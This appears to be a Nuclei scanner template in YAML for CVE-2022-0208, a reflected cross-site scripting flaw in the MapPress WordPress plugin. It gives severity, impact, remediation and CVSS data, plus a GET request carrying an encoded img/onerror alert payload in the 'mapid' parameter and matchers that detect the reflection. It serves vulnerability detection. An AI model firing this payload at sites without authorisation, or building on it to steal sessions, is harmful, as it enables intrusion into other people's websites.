id: CVE-2022-0208 info: name: WordPress Plugin MapPress <2.73.4 - Cross-Site Scripting author: edoardottt severity: medium description: | WordPress Plugin MapPress before version 2.73.4 does not sanitize and escape the 'mapid' parameter before outputting it back in the "Bad mapid" error message, leading to reflected cross-site scripting. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update to the latest version of MapPress (2.73.4 or higher) or apply the vendor-provided patch to fix the XSS vulnerability. reference: - https://wpscan.com/vulnerability/59a2abd0-4aee-47aa-ad3a-865f624fa0fc - https://nvd.nist.gov/vuln/detail/CVE-2022-0208 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-0208 cwe-id: CWE-79 epss-score: 0.04312 epss-percentile: 0.89178 cpe: cpe:2.3:a:mappresspro:mappress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: mappresspro product: mappress framework: wordpress tags: cve2022,cve,mappress,xss,wordpress,wp-plugin,wpscan,mappresspro,vuln http: - method: GET path: - "{{BaseURL}}/?mapp_iframe=1&mapid=--%3E%3Cimg%20src%20onerror=alert(document.domain)%3E" matchers-condition: and matchers: - type: word part: header words: - "text/html" - type: word part: body words: - "" - "Bad mapid" condition: and - type: status status: - 200 # digest: 4b0a00483046022100be0743413b5de4a524875deb94ebdec18558269923e815bb3a2d47c0ae79694a022100eb01186b4d645ad9a261ec37950fdab441fc3f97974de32e28ecc2ba292f43f6:922c64590222798bb761d5b6d8e72950